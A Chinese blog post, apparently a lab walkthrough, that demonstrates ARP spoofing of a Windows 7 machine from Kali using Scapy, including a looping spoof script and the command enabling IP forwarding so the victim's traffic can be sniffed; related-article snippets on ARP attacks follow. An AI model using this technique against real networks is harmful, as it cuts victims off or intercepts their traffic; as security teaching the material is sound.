利用 Python 开发包 Scapy 实现 ARP 欺骗

已于 2023-12-03 14:50:59 修改
阅读量696 收藏 14
点赞数 10
文章标签: 网络安全
于 2023-12-03 13:21:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60391255/article/details/134763794
版权

准备:Windows7,kali

方法一:

一、查看Windows和kali的IP以及网关IP

Windows7:

kali:

二、查看未欺骗前Windows的ARP缓存

三、kali上使用scapy工具进行ARP欺骗

四、查看欺骗后Windows的ARP缓存

Windows将网关的IP映射到kali的MAC地址,ARP欺骗成功

 以上的方法只发送了一个包,只能短暂对目标进行ARP欺骗,以下是用脚本实现一直发送多个包进行长久的ARP欺骗的方法

方法二:

一、在kali上编写脚本

#ARP欺骗
from scapy.all import *
import time
#构造包
#pdst是目标IP,psrc是网关的ip
p1=Ether(dst="",src="")/ARP(pdst="",psrc="")
for i in range(6000):
    sendp(p1)
    time.sleep(0.1)

 二、运行脚本

三、Windows上查看arp缓存

ARP欺骗成功,并且长时间有效。

此时虽然长时间能够对Windows目标机进行ARP欺骗,但是由于kali并不是真正的网关,所以Windows现在并不能访问外网(也就是只对目标机实现了断网攻击),可以发现无法ping百度。

使目标机连通外网,只对目标进行流量嗅探

一、开启kali的路由转发功能并对目标机进行ARP欺骗

开启kali的路由转发功能:

echo 1 > /proc/sys/net/ipv4/ip_forward

二、查看WindowsARP缓存并ping百度

成功实现目标机连通外网

Judy716
关注
  • 10
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Python实现ARP欺骗
xiaoxiao的博客
04-02 6674
实验目的:局域网段扫描,利用arp欺骗获取密码 :局域网上的一台主机,如果接收到一个ARP报文,即使该报文不是该主机所发送的ARP请求的应答报文,该主机也会将ARP报文中的发送者的MAC地址和IP地址更新或加入到ARP表中。ARP欺骗攻击就利用了这点,攻击者主动发送ARP报文。通过不断发送这些伪造的ARP报文,让局域网上所有的主机和网关ARP表,其对应的MAC地址均为攻击者的MAC地址,这样所...
利用 Python 开发包 Scapy 实现 ARP 欺骗_python实现ip欺骗检测
最新发布
m0_60635224的博客
04-09 985
Python编程学习,学习内容含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
Python Scapy实现ARP扫描和ARP欺骗
YHKKun的博客
02-08 939
ARP欺骗:通过伪造ARP响应来欺骗目标计算机和网关,使它们相信它们正在与对方通信,而实际上所有的通信都经过了攻击者的机器。ARP扫描:检测指定IP网段中哪些主机是在线的,并获取它们的MAC地址。
Python】使用scapy模块编写ARP欺骗脚本
Monsterlz123的博客
07-07 2618
Python】使用scapy模块编写ARP欺骗脚本 Hello,各位小伙伴们周末好~ 今天复习自己公众号写的文章,小编发现脚本模块现在只挂着两篇文章… 赶紧写起来!!!(公众号逼我学习系列~) 最近决定发奋图强,写多篇python脚本相关的东西 今天我们先来写一个简单的ARP欺骗脚本练练手吧~ 一、scapy工具 我们编写ARP欺骗脚本需要用到scapy模块,利用该模块我们根据自己的需要...
Scapy实现基于ARP/ICMP/TCP/UDP的活跃设备扫描技术,以及TCP全/半端口扫描
sGanYu
07-12 3961
目录基于ARP的活跃设备发现基于ICMP的活跃设备发现基于TCP扫描的活跃设备发现基于UDP扫描的活跃设备发现Scapy实现端口扫描基于TCP全开端口扫描基于TCP半开端口扫描ARP:地址解析协议,ARP(Address Resolution Protocol)根据IP地址获取物理地址的一个TCP/IP协议,环境所在的设备如果只知道目的设备的IP地址却不知道其MAC地址的时候,可以通过这种协议,使用以太 广播给网络上的每一台设备发送ARP数据,获取其中符合条件的MAC地址,以保证通信的顺利进行ARP的工
scapy(一):简介及实现ARP攻击
jpygx123的博客
11-20 7795
Scapy是一个强大的交互式数据处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据,能够发送、捕捉、匹配请求和回复等等。 最重要的他还有很多更优秀的特性——发送无效数据帧、注入修改的802.11数据帧、在WEP上解码加密通道(VOIP)、ARP缓存攻击(VLAN) 等,这也是其他工具无法处理完成的。 用scapy构造数据Scapy 中可以用特别简单的方法...
pythonscapy库,实现网卡收发的例子
09-19
Scapy 是一个强大的网络协议构造和操作库,用于在Python中进行网络数据的构建、解析、发送和接收。在本文中,我们将深入探讨如何使用 Scapy实现在网卡上进行数据的收发。 首先,我们需要了解 Scapy 的基本...
python_scapy
03-17
ScapyPython编程语言中一个强大的网络协议构造和分析库,它允许开发人员创建、修改和发送几乎任何网络协议的数据。"python_scapy"这个项目显然与使用Python 3版本的Scapy库相关,主要涉及到网络嗅探、数据构建...
python源码scapy-2.4.4.tar.gz
09-11
- **安全渗透测试**:利用Scapy构造各种攻击,进行安全漏洞的探测和利用。 - **性能评估**:测量网络的延迟、带宽和丢率。 - **协议分析**:深入理解网络协议的工作机制,学习网络原理。 - **恶意软件研究**:...
python scapy模块
01-03
例如,你可以使用Scapy进行DNS欺骗ARP欺骗,甚至构造复杂的网络攻击,如Teardrop攻击或Smurf攻击。同时,Scapy还可以用于创建蜜罐系统,模拟网络服务来诱捕攻击者。 压缩中的"scapy-master"可能是一个Scapy的源...
Python-scapy基于python的交互式数据处理程序和库
08-10
Python开发中,Scapy提供了一个高级接口,允许开发者轻松地构建和解析网络报文。其核心功能括但不限于: 1. **数据构造**:Scapy允许用户自定义数据结构,括TCP、UDP、IP、ARP等常见协议,甚至可以构建更...
python scapy的用法之ARP主机扫描和ARP欺骗
WY92139010的博客
03-10 649
python scapy的用法之ARP主机扫描和ARP欺骗 目录: 1.scapy介绍 2.安装scapy 3.scapy常用 4.ARP主机扫描 5.ARP欺骗 一、scapy介绍 scapy是一个可用于网络嗅探的非常强大的第三方库。 具有以下几个特点:   1.交互模式,用作第三方库。   2.可以用开做packet嗅探和伪造packet   3.已经再内部...
Python编程——使用scapy模块对局域网的某主机进行ARP欺骗和攻击
橘子女侠
03-08 2325
1. ARP协议 ARP(Address Resolution Protocol,地址解析协议),位于TCP/IP协议栈中的网络层,负责将某个IP地址转化成对应的MAC地址。 (1) 主机发送信息时将含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址; (2) 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询...
使用 Scapy 库编写 ARP 欺骗攻击脚本
Flag少侠的博客
03-26 1529
ARP(Address Resolution Protocol)缓存中毒是一种网络攻击,它利用ARP协议中的漏洞,通过欺骗或篡改网络中的ARP缓存来实施攻击。ARP协议是用于将IP地址映射到物理MAC地址的协议,在IPv4网络中,每台计算机都有一个ARP缓存,用于保存IP地址到MAC地址的映射关系,以便进行网络通信。
python实现——ARP攻击检测
LainWith的博客
09-05 2763
最近发现火绒的IP黑名单功能不能防护ARP攻击,只能防护二层以上的网络行为,就花了点时间开发了一个自动化工具,用来检测自己是否遭受了ARP欺骗攻击。我这里开发了2个脚本,普通版和plus版,两者的区别就是后者支持了取证功能。
【网络攻击手段之-----ARP欺骗
qq_53058639的博客
01-29 1427
本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP欺骗攻击,ARP 欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行ARP 欺骗攻击。做一个遵纪守法的公民,从我做起!!!ARP (Address Resolution Protocol) 是一种网络层协议,用于将 IP 地址转换为物理地址(MAC地址)。在局域网中,每台设备都有唯一的 MAC 地址,而 IP 地址是可以重复分配的。因此,当一个设备需要发送数据到另一个设备时,它需要知道另一个设备的MAC 地址。
使用scapy伪造arp请求及解析回传数据 获取同一局域网下的其他主机的IP和MAC
S4n_v1的博客
04-04 515
钝角
pythonarp工具_Python 实现ARP扫描欺骗工具
weixin_39900531的博客
12-05 397
实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址.from scapy.all import *from optparse import OptionParserimport threadingdef parse_ip(targets):_split = targets.split('-')first_ip =...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
python arp扫描_Python3利用scapy局域网实现自动多线程arp扫描功能
05-28
好的,你的问题是关于Python3利用Scapy局域网实现自动多线程ARP扫描功能。 首先,你需要安装Scapy库,可以使用以下命令: ``` pip install scapy ``` 然后,你可以使用以下Python代码实现ARP扫描功能: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值